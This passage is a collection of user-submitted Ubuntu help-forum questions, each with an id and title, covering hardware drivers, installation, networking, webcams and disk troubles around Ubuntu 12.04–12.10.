*disabled pci:0000:03:00.0 rp04 s4 *disabled pci:0000:00:1c.3 glan s4 *disabled lan2 s4 *enabled pci:0000:04:00.0 xhc s3 *disabled slpb s4 *enabled so i guess suspending it from the closing of lid/using the settings menu , something erratic happens that makes the system not suspend any more . my current os : ubuntu 13.04 beta 3.8.0-15-generic . though i tested with 12.10 as well and the observations are identical . any help please ?
263869	scanalyze install	i am trying to install scanalyze . i downloaded the source code , and in the compilation instructions for ubuntu , he has mentioned that for later versions of gcc ( mine is 4+ ) , there is a separate patched source , and the link for download is provided . i used that link to download my source , and while i tried to compile using make i got the following error cc1plus : error : unrecognized command line option ‘-fwritable-strings’ could you please help me how to overcome this and what changes i should make to install this efficiently ? i am using ubuntu 11.10 . this is the complete display after the make . make -j 1 scanalyze.debug build=debug \ -- directory=objs/debug -- makefile=../../makefile -i../.. skipcvs=1 make [ 1 ] : entering directory `/home/siddarth/scanalyze-1.0.3/objs/debug' g++ -fno-for-scope -fpermissive -fwritable-strings -w -g -i../.. - i../../auxlibs/include/tnt -march=i686 -mmd -o plvmain.o -c ../../plvmain.cc cc1plus : error : unrecognized command line option ‘-fwritable-strings’ make [ 1 ] : *** [ plvmain.o ] error 1 make [ 1 ] : leaving directory `/home/siddarth/scanalyze-1.0.3/objs/debug' make : *** [ debug ] error 2
263874	does any one knows what does mean : error no matching node is available in juju	i want to say there is no stable version of the implementation of juju with maas . kind of error without any wise log output.whatever ... does any one know at least approximately what refers to this error ? making the same installation from different tutorials so many times but the same ? is that the last version is bugging of something ?
263876	about apt-get downloading speed	i currently installed ubuntu linux on a hp laptop , but i found that the update and download speed of apt-get is extremely slow . i used to have an ubuntu installed on a dell laptop with the same ubuntu edition - 12.04 and the same downloading sources , but the downloading speed is quite good . why the apt-speeds are so different ? may be the wifi driver is not suitable for this hp laptop ? replies : thanks for all your answers ; - ) , it 's my first time to know and use this website , i did n't expect to get so many responses so soon . i 'll try this apt-fast when i get home today , to see if it will work good enough . for alvar 's questions of my network card model , i do n't have knowledge of this part , but it 's a hp probook 4431s , and from hp 's website , it says it 's atheros 802.11b/g/n wifi . and for laptop model , what 's this ? since the old dell loptop is not at my hand by now , the one thing i remember is that on dell pc , when i installed it with ubuntu 12.04.1 it do n't have wireless card 's driver so i installed one latter using some methods i found on the internet . but for this hp pc , the ubuntu 12.04.1 has direct support of its ' wireless card , so i do n't need to install a driver manually . i still think the problem might have something to do with the driver .
263878	ubuntu for iconia w700-6607 ?	is there any ubuntu for iconia w700-6607 ? i 've found some articles for w500 , but not sure if it works too . does someone have the how-to ? how to root , install & all ? specifications : thanks .
263882	loud fans - dell studio 1558	i 'm having a problem with my dell studio 1558 were my fans are running very loud . i never had this problem on windows 7 and i 'm really struggling to find a fix for it . i 've tried other distro 's as well and they have the exact same problem . it does n't seem to be cpu as nothing is using a lot of resources , i 've tried installing ati drivers but then i keep running into other problems and the noise does n't seem to go away . thanks for the help , much appreciated !
263886	how often will there be updates to the different developer phone images ?	we have a nexus 7 and are getting a nexus 4 . what are the plans for releasing updates to the os , and apps like the web browser ? where can i go to see if updates are coming out or details on specific version ?
263888	unable to add input method to ibus on kde anymore	i have become a fan of ibus on kde . it integrates what scim does with least amount of configuration . but since i have added the some input methods . i have not been able to add any more . so when i click on the ibus icon , i see this . and on clicking preferences i see the input methods on the ibus-preferences but , i am unable to add another input method from the menu there . all the input methods are grayed out there . how would i go about adding more input methods ?
263893	tried to install compiz now nothing on desktop	i installed ubuntu 12.04 32bit and all seemed well except i wanted compiz fusion too . after installing all the components from the software library , nothing seemed to have changed so i went to the terminal and ran sudo apt-get install fusion-icon . installation began and then i got a whole lot of errors ( did n't think to write them down : ( ) and now i ca n't see anything but wallpaper on my desktop ! also pressing ctrl-alt-t wo n't bring up a terminal neither will alt-f2 . i can get to a command line using ctrl-shift-f1 but do n't really know what to do once i 'm there to fix the problem .
263896	how to move a raw disk image to a pendrive to make it bootable ?	i tried to follow this : migrate from a virtual machine ( vm ) to a physical system but it is not working for me . i have a working xubuntu vdi image . i converted it like this : vboxmanage internalcommands converttoraw mydisk.vdi /home/wojtek/pobieranie/disk.img then i tried to move it to a newly formated pendrive : sudo dd if=/home/wojtek/pobieranie/mydisk.img of=/dev/sdb1 i got this : 18874368+0 records in 18874368+0 records out 9663676416 bytes ( 9.7 gb ) copied , 2831.46 s , 3.4 mb/s but now i ca n't even mount my pendrive . it 's shown as unformatted with all the space left . it does n't boot as expected . what did i do wrong ? i should have used sudo dd if=/home/wojtek/pobieranie/mydisk.img of=/dev/sdb , not sudo dd if=/home/wojtek/pobieranie/mydisk.img of=/dev/sdb1 as mike pointed out . thanks mike !
263898	partition table messed up . cant see any partition using gparted , though everything works ?	yesterday i was trying to install mageia linux along with windows 7 and ubuntu 12.10 . after several tries i finally installed mageia and created an entry for the mageia boot-loader in the windows boot manager . the problem is , though everything seems to be working perfectly , when i open gparted it says that there are no partitions on the hard disk . here 's a screen-shot : what is wrong , and how can i fix this without losing any data ?
263900	python runs way faster while the machine is shutting down ?	this morning when i was shutting my machine down from an overnight test of running opencv to display a data stream from one of my cameras , i noticed that my frame rates nearly doubled in the video window . this happens for about 3-5 seconds just before the os goes blank , but there is a very noticeable difference in video fps ( or processing with python.. ) . while the machine was shutting down i was wondering what might be some of these larg processes that are closing , and how much i even really need them during python runtime . now im trying to figure out what some of these processes are which are not mission critical to running python or opencv and shut them down . i was wondering however what you guys would recommend , up to now i felt that the frame rate i was getting was limited by the hardware . from what i noticed this morning now makes me think that there 's a good bit of hidden processing power running in the background that could potentially be tapped . im using a via p910-10q mobo + ubuntu 12.10 thanks for any advise
263902	ubuntu server12.04 not connecting to other lan ( via site-to-site vpn )	dear community members : i have a fresh install of ubuntu 12.04 server ( x64 ) , and planned using it as a web server within a local network , which has 3 physical locations connected via site-to-site vpn . i have found the nic card is set up correctly by looking through ifconfig , and able to ping google.com with no issue so the nameserver is also fine . problem is : i can only connect to the servere via workstations within the same lan ( 192.168.12.x ) , any computers from other 2 lans ( 192.168.11.x and 192.168.16.x ) can not connect with the server . it initially connected for a little while , but then all of sudden stopped . i tried to stop fire wall ( ufw ) and put all apparmor profiles in complain mode . still not helping . please help me to direct what to do ? thank you ! !
263906	do-release-upgrade or apt-get dist-upgrade to go from a 12.04.1 to 12.04.2 ?	i used to make an apt-get dist-upgrade to upgrade my system from 12.04.x to 12.04.x+1 , but now i have doubts if do-release-upgrade is better or even if that command classified as an option to such minor upgrades . in the do-release-upgrade man page one can read upgrade the operating system to the latest release but is not clear to me if that mean latest minor version or latest major version , because latest major version could be seem even like another os and not a version of the same os .
263909	ubuntu 12.10 slowing down other devices on my network	i 'm very much a linux noob , so this is probably something that 's easy to fix or find out . ever since i installed ubuntu , my internet speed seems to be good for my ubuntu pc , but nothing else . once i turn my pc off , or put it to sleep mood , the devices that were slow speed back up again . this problem happens to my nexus 7 and my playstation 3 , so it 's not a problem with an operating system , it 's to do with the network and maybe ubuntu in some way . any help would be appreciated , though i 'm not that well known with linux .
263911	i have ubuntu 12.04lts installed , how do i upgrade to 12.10 using a dvd ?	i am running ubuntu 12.04lts as the sole operating system and would like to upgrade to 12.10 . i have burned the iso image to a dvd . how do i go about upgrading via wifi or using the dvd ?
263912	problems with win 8	i have a hp compaq cq58 , with win 8 preinstalled . i want to install ubuntu on a different partition , and i have tried both with ubuntu 10.12 and with linux secure remix , i have disabled secure boot on the computer and made it bootable from cd , but it always says 'booting device failed , no volume label ' . what did i get wrong ? thanks in advance
263914	how do i customize the home folder launcher in the sidebar ?	i 'm using ubuntu 12.10 and for my side bar home folder launcher , i want to use different bookmarks . i have my music , pictures and videos on another drive and want the default ones to link to those folders on the other drive instead . how can i set which folders i want to use for the home folder launcher button ?
263917	install ubuntu touch on cheap arm a8 chip tablet ?	i was gifted an le pan tc 970 tablet ( it was on sale and could n't be passed up ) . it is omap3 , single core arm a8 , 500mb ram & 1 ghz . would ubuntu touch be able to be installed , or even kubuntu with plasma mobile ? or , is this just a low end tablet that will remain as is ? thank you for your time and answers .
263920	why do i get an error while building a test package from `` fixing a bug in ubuntu '' ?	i am trying to make my first bug fixing for ubuntu . while following the fixing a bug instruction from fixing-a-bug and packaging : link via changelog on developer.ubuntu.com i have encountered a problem at the setup `` testing the fix '' . while trying to build with bzr builddeb -- -s -us -uc , i have encountered below error message : dpkg-source : info : using source format `3.0 ( quilt ) ' dpkg-source : info : building totem using existing ./totem_3.0.1.orig.tar.gz dpkg-source : error : can not read totem-3.0.1.orig.b4x9vh/debian/patches/totem-1041032-fixed : no such file or directory dpkg-buildpackage : error : dpkg-source -b totem-3.0.1 gave error exit status 2 debuild : fatal error at line 1350 : dpkg-buildpackage -rfakeroot -d -us -uc -s failed bzr : error : the build failed . it seems there 's no such folder totem-3.0.1.orig.b4x9vh . i was stuck on not knowing why and how these folder would be generated under my branching for a change .
263922	how can i format a hard drive in ubuntu to use it as storage ?	i have an extra internal hard drive that i just want to use for storage . i want it to work with windows ( 7 ) and ubuntu . how could i just format it to have no operating system and just be used as storage while i 'm on ubuntu ? is their an application that can do this automatically ? what do i format it in ?
263924	disk will not mount	i get the folowing error when i try to mount a drive : error mounting /dev/sda1 at /media/ubuntu/f2bebb2d-d57d-4c75-b719-cda5a73d8531 : command-line `mount -t `` ext4 '' -o `` uhelper=udisks2 , nodev , nosuid '' `` /dev/sda1 '' `` /media/ubuntu/f2bebb2d-d57d-4c75-b719-cda5a73d8531 '' ' exited with non-zero exit status 32 : mount : wrong fs type , bad option , bad superblock on /dev/sda1 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so there are two partition on my hard disk . i have tried starting up with the install disk to see if there are any disk repair apps but it seem that there are not .
263926	lenovo s10-2 easy camera not detected	i recently installed ubuntu 12.10 on the gnome3 desktop environment . my webcam was working fine during the ubuntu installation when it asked me to be snapped by my webcam or choose a picture instead . however , the webcam does not show on skype 4.1.10 , which i installed earlier today . the video device tab in skype options does not detect a webcam . neither does cheese and shows a blank screen . i do n't even know if correct drivers for my cam are installed or not . gnome3 does not have `` hardware '' in system settings and i can not find any way to install additional hardware drivers . i have a lenovo s10-2 netbook with the following specs : intel® atom™ cpu n280 @ 1.66ghz × 2 ram : 993.4 mib graphics : unknown ( on board ? ) ubuntu partition : 14 gb os type : 32 bit typing lsusb in the terminal gives me this output : starts bus 005 device 002 : id 0a5c:2150 broadcom corp. bcm2046 bluetooth device bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub ends no luck with several thread on ubuntuforums or askubuntu or https : //wiki.ubuntu.com/skypewebcams downloaded this : https : //launchpad.net/ubuntu/quantal/+source/libwebcam but again , do n't know how to install it or is it even going to help . i am a journalist and need to use skype a lot for video interviews . i would be really grateful for any help to get me out of this mess . anybody ? ? ?
263927	how to install driver for atheros ar8161 in ubuntu 11.10	i am completely new in using ubuntu , studying painful and trying to find a way . most discussions are for ubuntu 12.10 , so what packages should i install for this driver if i use 11.10 ?
263928	what is the command to retrieve the pass phrase of an encrypted home directory ?	i remember setting a password to encrypt my directory when i installed ubuntu , and running a command to retrieve a pass phrase in case i lost the password . can anyone tell me what is the terminal command to retrieve the pass phrase ?
263937	how do i get more hard drive space ?	i 'm dual booting ubuntu 12.10 with windows 7 & i installed ubuntu 12.10 on a 100gig partition but the biggest hd space option when i installed ubuntu was only 30gig . how can i allocate more space for ubuntu on that partition ?
263941	acer aspire one kav60 webcam	i 'm having troubles to getting work the webcam of one netbook , the model is `` acer aspire one '' and in the bottom the model no . is kav60 . i install luvcview package like says in this guide but it 's not working the webcam ( here is the guide : https : //help.ubuntu.com/community/aspireoneaod250 ? action=show & redirect=aspireone % 2faod250 ) the lsusb is : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub the dmicode : $ dmidecode -t 1 # dmidecode 2.11 smbios 2.4 present . handle 0x0001 , dmi type 1 , 27 bytes system information manufacturer : acer product name : aspire one version : v1.02 serial number : lus680b072916042d71601 uuid : 0c4726e7-2ae7-44b8-6467-00235a8bac69 wake-up type : power switch sku number : basicnb_qs family : intel_mobile and the lspci : lspci -n 00:00.0 0600 : 8086:27ac ( rev 03 ) 00:02.0 0300 : 8086:27ae ( rev 03 ) 00:02.1 0380 : 8086:27a6 ( rev 03 ) 00:1b.0 0403 : 8086:27d8 ( rev 02 ) 00:1c.0 0604 : 8086:27d0 ( rev 02 ) 00:1c.1 0604 : 8086:27d2 ( rev 02 ) 00:1c.2 0604 : 8086:27d4 ( rev 02 ) 00:1d.0 0c03 : 8086:27c8 ( rev 02 ) 00:1d.1 0c03 : 8086:27c9 ( rev 02 ) 00:1d.2 0c03 : 8086:27ca ( rev 02 ) 00:1d.3 0c03 : 8086:27cb ( rev 02 ) 00:1d.7 0c03 : 8086:27cc ( rev 02 ) 00:1e.0 0604 : 8086:2448 ( rev e2 ) 00:1f.0 0601 : 8086:27b9 ( rev 02 ) 00:1f.1 0101 : 8086:27df ( rev 02 ) 00:1f.2 0106 : 8086:27c5 ( rev 02 ) 00:1f.3 0c05 : 8086:27da ( rev 02 ) 01:00.0 0200 : 168c:001c ( rev 01 ) 03:00.0 0200 : 1969:1062 ( rev c0 ) here is the lsb_release : lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 12.10 release : 12.10 codename : quantal regards ,
263943	chrome url triple-click behavior	i know i can use alt-d , f6 , ctrl-l . but is there a way to change the default behavior , as with firefox 's about : config , so that clicking in the url selects it all ? i know it is only a couple of keystrokes , but ... .
263947	trouble updating ubuntu 11.10 to 12.10	newbee here . i 'm trying to update ubuntu because every program i try to get from the software center fails . i 'm assuming because they do n't support 11.10 anymore . if thats not the reason i 'd love some help otherwise . but ... i tried updating to 12.10 and that failed so my next intention is to install 12.10 from the raw cd , which i have downloaded . it 's too big to put on a cd so i 'd like to do upload it to my ipod and run it from that . is this possible and how do i .
263949	is backtrack is derivative of ubuntu ?	i have read somewhere taht backtrack is a ubuntu linux . i am confused . i know quite well that backtrack is a linux , but apparently backtrack is also an ubuntu . please , clarify me this .
263951	xorg fails to start with intel graphics	ever since the installation of ubuntu 12.10 on my laptop today it has been refusing to start xorg when booting on occasions . randomly it works but about 75 % of the time it either gives me a black screen with login prompt or the fail safe mode , the latter being the most common . using ctrl+alt+f1 to go to a terminal like screen , i managed to crack open the /var/log/xorg.0.log file on the `` faulty '' boot process . here are some lines which look interesting to me : ( ee ) intel ( 0 ) : [ drm ] failed to open drm device for pci:0000:00:02.0 : no such file or directory ( ee ) intel ( 0 ) : failed to become drm master . ( ii ) unloadmodule : `` intel '' ( ee ) screen ( s ) found , but none have a usable configuration . fatal server error : no screens found it is apparently loading the `` vesa '' driver package . specs of my laptop : cpu : intel core i5 2450m gpu : intel hd graphics 3000 ram : 8 gb ddr3 os : windows 8 + ubuntu 12.10 ( fully updated ) any ideas ? any suggestions are very welcome , even if they do n't work as expected .
263961	setting ubuntu as the default operating system when using the windows installer	how do you set ubuntu as the default operating system after you have installed ubuntu with the windows ubuntu installer ?
263962	lost all my data after changing windows 8 to ubuntu	i need some help ! i decided to change my win 8 to ubuntu 12.10 . in installation option i select the change win 8 to ubuntu . i had two partition c 50gb and d 450 gb . on c were the windows , and there i want to install the ubuntu . but ... after installation i have n't found my d partition just one was there 460 gb . it 's there some option to recover my dates , or all gone for all ?
263965	12.04 ltsp thin client black screen	this topic seems to have been covered quite heavily within these forums but there does n't seem to be any trend from what i 've read so far so i 'm just looking to for some starting points to help troubleshoot . i have thin client booting successfully over dhcp . all looks good and the screen with the flashing dots appears leading me into thinking that i 'm about to see the expected log-in screen . however , all that transpires is a blank , black screen - that 's it ! no error ( s ) ! nothing ! i 've changed my pxelinux.cfg/default file and removed `` quiet splash '' and restarted the thin client . still nothing useful is presenting itself . my assumption at this point is that this is not an dhcp issue . thanks , djc
263969	unity3d web player with chrome native client ?	after reading up on various websites , i am rather confused about the ability to run unity3d ( http : //unity3d.com/ ) web player in native client . i am not sure whether it is the unity 3d engine itself which can run in native client or unity 3d web player . i was hoping to find information on running the unity 3d web player in native client in chrome , because there are certain sites that require the web player , but that is available only for windows or mac . has anybody got more information on this or tried it themselves ? one of the sites whose content i want to access is http : //intoscience.com/ .
263977	setting up a bootable usb iso	so , i 've got an ext3 partition on a removable usb device . its /dev/sdb1 on my system . after mounting this partition : sudo mount /dev/sdb1 /mnt/usb i install grub on it : sudo grub-install -- root-directory=/mnt/usb /dev/sdb1 grub installs without any errors . next , i copy the iso image to this partition 's root : /mnt/usb/ubuntu.iso now i add a grub conf file at /mnt/usb/boot/grub/grub.cfg : menuentry `` run ubuntu live iso '' { loopback loop /ubuntu.iso linux ( loop ) /casper/vmlinuz boot=casper iso-scan/filename=/ubuntu.iso splash -- initrd ( loop ) /casper/initrd.lz } all good , reboot . . . but grub never loads the menu entry ! ! , it just starts into grub prompt . can anyone explain what goes wrong ?
263978	how to proceed installation after reaching at 'try ubuntu ' ?	i can successfully boot from usb , the ubuntu purple screen comes . 2 options pop up : try ubuntu & install ubuntu . after clicking install ubuntu , in the next step memory space allocation is made , admin password is given . then `` continue '' is clicked . ubuntu purple screen comes up , pc shuts down and reboots from usb again . then the process repeats.. pls help to resolve this issue .
263981	how to parse text messages on ubuntu touch	hi i want to be able to parse text messages on ubuntu touch for a specific key word . i understand how to do it on android , but it is looking like this is very different than on ubuntu touch . unfortunately i am unable to find any documentation for how to do this . does anyone have any idea ?
263985	synced files vanishing	i have been using u1 to sync my documents folder across my desktop and laptop ( both ubuntu , both syncing to ~/documents ) . however , edited files are disappearing . for a sample file foo.lyx : create foo.lyx on my laptop , save it , close lyx and suspend laptop foo.lyx is synced to desktop , appears in ~/documents open foo.lyx on desktop , edit , and save close lyx program on desktop ( so file is not active ) awaken laptop , let files sync foo.lyx no longer exists on laptop ~/documents neither is foo.lyx.u1conflict or similar download foo.lyx from u1 website save foo.lyx in original location , after next sync , foo.lyx is gone again re-download and save as foo2.lyx , which persists i have not tried this to see if it happens with non-lyx files , but it has happened several times to different .lyx files in different sub-directories . the ~/documents is only synced between these two computers . any ideas why this is happening and how i can avoid it ? renaming these files is messing with the inter-document links , not to mention the small moments of terror when a chapter vanishes .
263989	really good video editor for linux	i need to find out about a good movie editor . i need one that has a lot of features . any ideas ?
263990	openjdk not working in ubuntu 12.10 on firefox	this is a problem i 've been facing for quite some time now : installing java . i have installed the following packages using synaptic icedtea-netx openjdk-7-jre a few others got installed along with it like icedtea-netx-common and a few others ... but the thing is , the java site still tells me that java is n't installed . i 'm using ubuntu 12.10 and firefox . any help regarding this ?
263996	fixing the nvidia graphics screen flicker issue	i know there are a lot of questions about this -- i 've read at least 100 questions about it but still ca n't find a solution to the nvidia screen flicker issue . i 've had this issue since 11.10 . the screen jitters and flickers about every 3-5 seconds . i 'm running ubuntu 12.04 lts on a gateway gt5028 with the nvidia 6100 . any solution would be appreciated . i 'd like to see this issue resolved for me .
264001	how to troubleshoot ethernet port on laptop	i have a problem with my wired connection . to be more specific , my laptop does n't seems to recognize that i have plugged in an ethernet cable . i tried to download new drivers for my ethernet card , but i could n't find any solutions . maybe because i am new to linux , so i 'm not familiar with running commands in the terminal . ok i have typed the command and here are the results : 00:04.0 ethernet controller [ 0200 ] : silicon integrated systems [ sis ] 191 gigabit ethernet adapter [ 1039:0191 ] ( rev 02 ) for the second reply i do n't know if the following is what you asked me : ⠀memory : 3.9 gib ⠀processor : intel core 2 duo cpu p8800 @ 2.66ghz × 2 ⠀os type : 32-bit my ethernet connection had some problem on windows too . i have changed recently my internet provider , and since then my ethernet cable is not recognized by the laptop . at that time i was still on windows . i thought that with ubuntu the problem would be solved , but unfortunately the problem still persists . if someone can help me to solve my problem i 'll be thankful . here are the results of the three first commands you told me to run : lsmod | grep sis190 sis190 22570 0 sudo modprobe sis190 ifconfig eth0 link encap : ethernet hwaddr 00:90 : f5:90:81:7e up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:185 errors:0 dropped:0 overruns:0 frame:0 tx packets:185 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:22672 ( 22.6 kb ) tx bytes:22672 ( 22.6 kb ) wlan0 link encap : ethernet hwaddr 00:25 : d3:2c:3a : ae inet addr:192.168.1.72 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :225 : d3ff : fe2c:3aae/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:260 errors:0 dropped:0 overruns:0 frame:0 tx packets:363 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:71992 ( 71.9 kb ) tx bytes:52000 ( 52.0 kb ) and the results of running the last two commands : dmesg | grep -e eth -e sis190 [ 0.816667 ] sis190 : sis190 gigabit ethernet driver 1.4 loaded [ 0.816728 ] sis190 0000:00:04.0 : setting latency timer to 64 [ 0.816751 ] sis190 : 0000:00:04.0 : read mac address from eeprom [ 0.904032 ] sis190 : 0000:00:04.0 : realtek phy rtl8201 transceiver at address [ 1.416030 ] sis190 : 0000:00:04.0 : using transceiver at address 1 as default [ 1.448235 ] sis190 0000:00:04.0 : eth0 : 0000:00:04.0 : sis 191 pci gigabit ethernet adapter at f8410000 ( irq : 19 ) , 00:90 : f5:90:81:7e [ 1.448238 ] sis190 0000:00:04.0 : eth0 : gmii mode . [ 1.448243 ] sis190 0000:00:04.0 : eth0 : enabling auto-negotiation [ 11.560907 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 16.372019 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 16.372265 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 26.424038 ] sis190 0000:00:04.0 : eth0 : auto-negotiating ... nm-tool networkmanager tool state : connected ( global ) - device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : sis190 state : unavailable default : no hw address : 00:90 : f5:90:81:7e capabilities : carrier detect : yes wired properties carrier : off
264004	linux 12.10 quantal does not load nvidia driver version 313.18 for geforce gt 650m	i have an hp envy dv7 7212 with the geforce gt 650m . i dual boot windows 8 and linux 12.10 , quantal . the video hardware operates properly under windows 8 . the linux drivers are not loaded by the time that i try to login to x. i get what looks like a safe x boot screen at 600x800 resolution i 've generated a great number of log files and reference some of their data here nvidia-installer.log for the 313.18 installer shows no errors and successful completion i 've added blacklist entries in /etc/modprobe.d/blacklist.conf for nouveau and nvidiafb and my lsmod does not show them loaded . though , the nvidia module is loaded with 0 users associated with it . the system is running : linux theturk 3.7.0-030700-generic # 201212102335 smp tue dec 11 04:36:24 utc 2012 x86_64 x86_64 x86_64 gnu/linux lsb_release produces the following output no lsb modules are available . distributor id : ubuntu description : ubuntu 12.10 release : 12.10 codename : quantal using the nvidia-debugdump tool to list graphics devices i receive the following output found 1 nvidia devices device id : 0 device name : geforce gt 650m gpu internal id : gpu-1641f115-0090-aa40-d0ff-ae73bf5e3f85 lsmod provides a number of output items , however , the following are key ... nvidia 9139978 0 ... uvcvideo 82215 0 videobuf2_core 36138 1 uvcvideo videodev 130085 2 uvcvideo , videobuf2_core videobuf2_vmalloc 12861 1 uvcvideo videobuf2_memops 13405 1 videobuf2_vmalloc ... video 19413 1 i915 lshw -c display produces the following output *-display unclaimed description : vga compatible controller product : gk107 [ geforce gt 650m ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller bus_master cap_list configuration : latency=0 resources : memory:72000000-72ffffff memory:40000000-4fffffff memory:50000000-51ffffff ioport:4000 ( size=128 ) memory:52000000-5207ffff *-display description : vga compatible controller product : 3rd gen core processor graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:45 memory:73000000-733fffff memory:60000000-6fffffff ioport:5000 ( size=64 ) lspci -vnn | grep '\ '' [ 030 [ 02 ] ] ' produces the following 00:02.0 vga compatible controller [ 0300 ] : intel corporation 3rd gen core processor graphics controller [ 8086:0166 ] ( rev 09 ) ( prog-if 00 [ vga controller ] ) 01:00.0 vga compatible controller [ 0300 ] : nvidia corporation gk107 [ geforce gt 650m ] [ 10de:0fd1 ] ( rev a1 ) ( prog-if 00 [ vga controller ] ) xorg.0.log shows some errors claiming ... [ 24.355 ] initializing built-in extension dri2 [ 24.355 ] ( ii ) loadmodule : `` glx '' [ 24.593 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libglx.so [ 26.822 ] ( ii ) module glx : vendor= '' nvidia corporation '' [ 26.822 ] compiled for 4.0.2 , module version = 1.0.0 [ 26.822 ] module class : x.org server extension [ 26.822 ] ( ii ) nvidia glx module 313.18 wed jan 9 15:34:35 pst 2013 [ 26.845 ] loading extension glx [ 26.845 ] ( ii ) loadmodule : `` nvidia '' [ 26.845 ] ( ii ) loading /usr/lib/xorg/modules/drivers/nvidia_drv.so [ 27.003 ] ( ii ) module nvidia : vendor= '' nvidia corporation '' [ 27.003 ] compiled for 4.0.2 , module version = 1.0.0 [ 27.003 ] module class : x.org video driver [ 27.060 ] ( ii ) nvidia dlloader x driver 313.18 wed jan 9 15:15:26 pst 2013 [ 27.060 ] ( ii ) nvidia unified driver for all supported nvidia gpus [ 27.076 ] ( ++ ) using vt number 7 [ 27.076 ] ( ee ) no devices detected . ... [ 28.531 ] ( ee ) failed to initialize glx extension ( compatible nvidia x driver not found ) ... having discovered that this could be an optimus issue . i 've installed bumblebee according to their recommendations http : //bumblebee-project.org/install.html # ubuntu however , i 've ended up with some further issues . i 'm searching for information on these , but i thought i 'd go ahead and record them here for posterity . first off , i get to the lightdm login screen just fine , but when i enter my password , i end up crashing the x server , or lightdm , and getting sent back to the login prompt , the login prompt reloads with that familiar chiming sound and further attempts to login result in the same crash and prompt repeating . /var/log/upstart/bumblebee.log repeats the following 2 messages : ls : can not access /usr/lib/nvidia*/libgl.so : no such file or directory /proc/self/fd/9 31 : exec : /usr/sbin/bumblebeed : not found the first message is odd because /usr/lib/nvidia-current/libgl.so does exist the second is string because /usr/sbin/bumblebeed exists /var/log/upstart/lightdm.log repeats this message : ** ( process:12342 ) : warning ** : error reading existing xauthority : error opening file : permission denied error writing x authority : error opening file '/home/gary/.xauthority ' : permission denied /var/log/syslog repeats this message : bumblebeed [ ] : module 'nvidia-current ' is not found
264008	ca n't see my nexus 4 with fastboot on ubuntu 12.10	i have just received my nexus 4 and i want to plug it in to root it/copy files onto it but somehow i ca n't see it while i use $ sudo fastboot devices i am using this version of fastboot on my ubuntu laptop android-tools-fastboot 4.1.1+git20120801-1 edit while the issue of rooting the device was solved ( simply fastboot only sees devices while they are in bootloader ) i still can not see the device while i plug it in the system .
264009	wi-fi on windows became very slow when i connect from ubuntu	i have two machines in my wi-fi network : a windows machine and ubuntu machine . when i connect my ubuntu computer to my wi-fi network , the internet speed on windows machine becomes awfully slow . at the same time the internet speed on ubuntu is ok . if i reboot my ubuntu computer to windows , all the computers in the network work fine . i 'm not running any p2p software at the time ( transmission is closed ) . system monitor does n't show any significant amount of network traffic on my machine .
264010	how to turn off quickboot/fastboot on hp pavillion	i want to install ubuntu on my hp pavillion g6 . it has a windows 8 logo , but in the bios , i ca n't disable quickboot or fastboot , ( i ca n't even find it in the bios . ) how can i turn it off ?
264011	can not install 12.10 , it does n't detect a hdd	trying to get a client functioning until dell will send her system restore media . the original hdd failed only after 1yr 6mos of light use ( the system was a print server for 3 hours a day ) with out any symptom or warning . i have a known good 400gb hdd and 80gb hdd . the problem : ubuntu will not see either to install . all the live dvd detects is itself and no other devices . each drive will appear correctly in post and bios . i have tried different sata ports with no difference , and i only connect one hdd at a time . the system is a generic inspiron 620s : core i3 4gb ddr3 1333 it had windows 7 64-bit and i have had nothing but licensing problems with dell and ms when using an iso or oem to restore it . while this is not truly critical , my client has been inconvenienced for three months now because dell refuses to send her recovery media for whatever reason .
264015	revert to nautilus	after i installed cinnamon , nemo automatically installed itself , and now nemo is default file browser . how can i revert to nautilus .
264016	just installed ubuntu on my nexus 10 ... how do i get to a bash terminal ?	i just installed the touch preview on my nexus 10 . it is not at all what i expected . i thought it would be just like my desktop ; i 'm not at all interested in the `` experience '' ... all i want is a bash prompt : ) is this possible , or have i totally misconstrued what canonical intended to provide ?
264017	how to install ubuntu and eliminate windows ?	i have installed ubuntu 12.10 , but when i turn on the pc , i can choose between win 7 or ubuntu . how do i install ubuntu substituting completely windows ? .
264024	how can i properly install ubuntu onto my hp pavillion dv6000 ?	after trying to install ubuntu 12.10 on my hp dv6000 my home screen is blank and does n't show icons also the screen resolution is messed up how can i properly install ubuntu ? im trying to install ubuntu on to the brand new hard drive i installed . 320 gb
